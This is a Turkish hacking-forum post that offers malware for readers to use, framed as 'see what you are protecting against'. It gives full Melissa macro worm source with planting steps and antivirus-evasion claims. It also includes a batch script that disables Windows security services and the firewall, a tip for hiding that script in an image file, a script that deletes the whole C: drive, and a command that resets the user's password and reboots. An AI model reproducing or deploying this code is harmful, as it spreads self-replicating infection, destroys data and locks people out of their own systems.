THT DUYURU

chat
Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

takipci
Seçenekler

virüs yazılımı

PoseidonKairos - ait Kullanıcı Resmi (Avatar)
Hesap Askıya Alındı
Üyelik tarihi:
01/2012
Nereden:
System{C;/<>Windows<>Fontsss<>Osksd
Mesajlar:
426
Konular:
131
Teşekkür (Etti):
42
Teşekkür (Aldı):
68
Ticaret:
(0) %
0
885
14-02-2012 21:11
#1
sürekli virüslere karşı önlem aldınız şimdi virüs yazılımını verelim ve görün nelere karşı önlem alıyorsunuz



2 sene önce dünya bilgisayar piyasasını altüst eden bir virüs.
Yapımı:
Bir Microsft Word belgesi açyoruz.Daha sonra yeni belge açıp Alt + f11'e basarak Microsoft Visual Basic'i açıyoruz
Project 1 / Microsoft Word objects / This ******** seklinde 3 lü bir seçim geliyor karşımıza...
This ********i seçmeliyiz bu aşamada. Seçimi yaptıktan sonra asagıda verilmış olan Melısssa kodlarını yapıştırıyoruz ve kaydediyoruz bu belgeyi.
Melissa Visuel Basic virüsüdür. .Exe olamaması bunu inandırma oranını 100 de 100 arttırr .
Fakat panda,norton,mcafee,mks virüs olarak buluyor ancak kaspersky(5.0) ve avast(4.7) tanımıyor tabi avg eksik kalıyor bu konuda.
Not: Çalışıyor. Denendi.
Melıssa Kodları:

Private Sub ********_Open() ' Writted By eXit
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9 .0\W ord\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabl ed = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9 .0\W ord\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that ******** you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add Active********.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = Active********.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If

If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub ********_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub ********_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, Active********.Name, "********") = False) Then
Active********.SaveAs FileName:=Active********.FullName
ElseIf (InStr(1, Active********.Name, "********") <> False) Then
Active********.Saved = True
End If

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
__________________________________________________ __________
2. Virüs
__________________________________________________ __________

KOD:


@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO A R E S
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0



Not defterine kopyalayıp adını virüs.bat veya virüs.cmd olarak kaydedin
Herhangi bir resim ile birleştirmek isterseniz ;

Resme sağ tıklayın Birlikte Aç >Not Defteri yapıp kodu resmin sonuna ekleyin.

Not: Kaspersky , Norton , NOD32 , Avast gibi anti virüslere yakalanmaktadır.
__________________________________________________ __________
3. Virüs
__________________________________________________ __________

@echo off
C:\WINDOWS\COMMAND\deltree /y......
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls

Uzantı: .bat
__________________________________________________ __________
4.Virüs
__________________________________________________ __________
Kodlar:
net user %username% 753951456852
shutdown -r

Uzantı: .bat

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler